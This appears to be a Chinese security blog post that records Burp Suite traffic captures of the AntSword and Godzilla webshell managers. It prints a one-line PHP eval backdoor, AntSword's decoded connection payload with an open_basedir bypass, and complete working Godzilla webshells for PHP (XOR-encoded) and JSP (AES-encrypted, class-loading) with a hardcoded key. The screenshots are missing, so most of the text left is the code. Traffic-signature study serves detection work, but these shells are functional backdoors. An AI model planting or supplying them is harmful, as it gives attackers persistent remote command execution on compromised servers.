蚁剑哥斯拉burpsuite流量记录

简介: 蚁剑哥斯拉burpsuite流量记录

@[TOC]

蚁剑

php

准备 1 句话木马
<?php @eval($_POST[1]);?>

在这里插入图片描述

测试连接发包编码器

默认设置

在这里插入图片描述

base64

在这里插入图片描述

chr

在这里插入图片描述

chr16

在这里插入图片描述

rot13

在这里插入图片描述

解码后

@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
    $ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr=preg_split("/;|:/",$opdir);
    @array_push($oparr,$ocwd,sys_get_temp_dir());
    foreach($oparr as $item) {
        if(!@is_writable($item)) {
            continue;
        }
        ;
        $tmdir=$item."/.1acde603e";
        @mkdir($tmdir);
        if(!@file_exists($tmdir)) {
            continue;
        }
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr=@preg_split("/\\\\|\//",$tmdir);
        for ($i=0;$i<sizeof($cntarr);$i++) {
            @chdir("..");
        }
        ;
        @ini_set("open_basedir","/");
        @rmdir($tmdir);
        break;
    }
    ;
}
;
;
function asenc($out) {
    return $out;
}
;
function asoutput() {
    $output=ob_get_contents();
    ob_end_clean();
    echo "37"."ff2";
    echo @asenc($output);
    echo "be94e"."e186a3";
}
ob_start();
try {
    $D=dirname($_SERVER["SCRIPT_FILENAME"]);
    if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
    $R="{$D}    ";
    if(substr($D,0,1)!="/") {
        foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";
    } else {
        $R.="/";
    }
    $R.="    ";
    $u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
    $s=($u)?$u["name"]:@get_current_user();
    $R.=php_uname();
    $R.="    {$s}";
    echo $R;
    ;
}
catch(Exception $e) {
    echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();
这个就算是蚁剑的连接特征,执行其他操作是会在尾部加上数据

虚拟终端的 ls

在这里插入图片描述
虚拟终端的 ipconfig

在这里插入图片描述

解码器

解码器就是在响应中设置编码,这里测试的是查看1.php(该木马)文件的流量

base64

在这里插入图片描述

加密的base64还被混淆些内容,一般的base64还不能够解码

在这里插入图片描述

rot13

在这里插入图片描述

加密的rot13也被混淆些字节内容

在这里插入图片描述

哥斯拉

php

EVAL_XOR_BASE64

<?php
eval($_POST["pass"]);
  • 初始化请求

在这里插入图片描述

  • 命令执行 ipconfig

在这里插入图片描述

  • 文件查看 原木马

在这里插入图片描述

XOR_BASE64

  • payload
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
        eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}
  • 初始化请求

在这里插入图片描述

  • 命令执行 ipconfig

在这里插入图片描述

  • 文件查看 原木马

在这里插入图片描述

XOR_RAW

  • payload
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){
    $data=encode($data,$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
        eval($payload);
        echo encode(@run($data),$key);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}
  • 初始化请求

在这里插入图片描述

  • 命令执行 ipconfig

在这里插入图片描述

  • 文件查看 原木马

在这里插入图片描述

jsp

AES_BASE64

  • payload
<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}
%>
  • 初始化请求

在这里插入图片描述

  • 命令执行 ipconfig

在这里插入图片描述

  • 文件查看 原木马

在这里插入图片描述

AES_RAW

  • payload
<%! String xc="3c6e0b8a9c15224a"; class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }}
%><%try{byte[] data=new byte[Integer.parseInt(request.getHeader("Content-Length"))];java.io.InputStream inputStream= request.getInputStream();int _num=0;while ((_num+=inputStream.read(data,_num,data.length))<data.length);data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters", data);Object f=((Class)session.getAttribute("payload")).newInstance();java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();f.equals(arrOut);f.equals(pageContext);f.toString();response.getOutputStream().write(x(arrOut.toByteArray(), true));} }catch (Exception e){}
%>
  • 初始化请求

在这里插入图片描述

  • 命令执行 ipconfig

在这里插入图片描述

  • 文件查看 原木马

在这里插入图片描述

e33637908a8e2c2f0cadfb6b6c630ad9.gife33637908a8e2c2f0cadfb6b6c630ad9.gife33637908a8e2c2f0cadfb6b6c630ad9.gife33637908a8e2c2f0cadfb6b6c630ad9.gife33637908a8e2c2f0cadfb6b6c630ad9.gife33637908a8e2c2f0cadfb6b6c630ad9.gife33637908a8e2c2f0cadfb6b6c630ad9.gife33637908a8e2c2f0cadfb6b6c630ad9.gife33637908a8e2c2f0cadfb6b6c630ad9.gife33637908a8e2c2f0cadfb6b6c630ad9.gif

相关文章
|
3月前
|
安全 网络协议 关系型数据库
黑客红客,都用过这个工具扫端口!
黑客红客,都用过这个工具扫端口!
pikachu靶场通关秘籍之跨站请求伪造攻击
pikachu靶场通关秘籍之跨站请求伪造攻击
128 0
pikachu靶场通关秘籍之跨站请求伪造攻击
|
开发框架 安全 .NET
Dedecms打点入内网
Dedecms打点入内网
|
安全 Shell 网络安全
Symfonos靶场打靶记录
Symfonos靶场打靶记录
105 0
|
Web App开发
记一次burp抓包出错排查
记一次burp抓包出错排查
581 0
|
存储 网络协议 前端开发
【网络篇】第十四篇——HTTP协议(一)(附带电视剧李浔同款爱心+端口号被恶意占用如何清除)(二)
【网络篇】第十四篇——HTTP协议(一)(附带电视剧李浔同款爱心+端口号被恶意占用如何清除)
【网络篇】第十四篇——HTTP协议(一)(附带电视剧李浔同款爱心+端口号被恶意占用如何清除)(二)
|
域名解析 编解码 网络协议
【网络篇】第十四篇——HTTP协议(一)(附带电视剧李浔同款爱心+端口号被恶意占用如何清除)(一)
【网络篇】第十四篇——HTTP协议(一)(附带电视剧李浔同款爱心+端口号被恶意占用如何清除)
【网络篇】第十四篇——HTTP协议(一)(附带电视剧李浔同款爱心+端口号被恶意占用如何清除)(一)
|
SQL 安全 关系型数据库
网站被劫持了自动跳转彩票网站怎么修复
某一客户单位的网站首页被篡改,并收到网监的通知说是网站有漏洞,接到上级部门的信息安全整改通报,贵单位网站被植入木马文件,导致网站首页篡改跳转到caipiao网站,根据中华人民共和国计算机信息系统安全保护条例以及信息安全等级保护管理办法的规定,请贵单位尽快对网站漏洞进行修复,核实网站发生的实际安全问题,对发生的问题进行全面的整改与处理,避免网站事态扩大。我们SINE安全公司第一时间应急响应处理,对客户的网站进行安全检测,消除网站安全隐患。
260 0
网站被劫持了自动跳转彩票网站怎么修复
|
安全 数据安全/隐私保护
公司网站被黑 跳转到彩票网站的处理解决办法
2019年元旦很多公司遇到网站被黑的问题,因为大多数网站用的都是一些主流,开源的cms系统开发的程序,还有的公司找的当地网站建设公司去做的网站,而网站天天被黑的遭遇找到网站建设公司也只能解决一时,没过多久网站又被黑了,具体的情况特征以及如何解决网站被黑,下面由国内网站安全公司的Sine安全技术来为大家逐一解答.
2789 0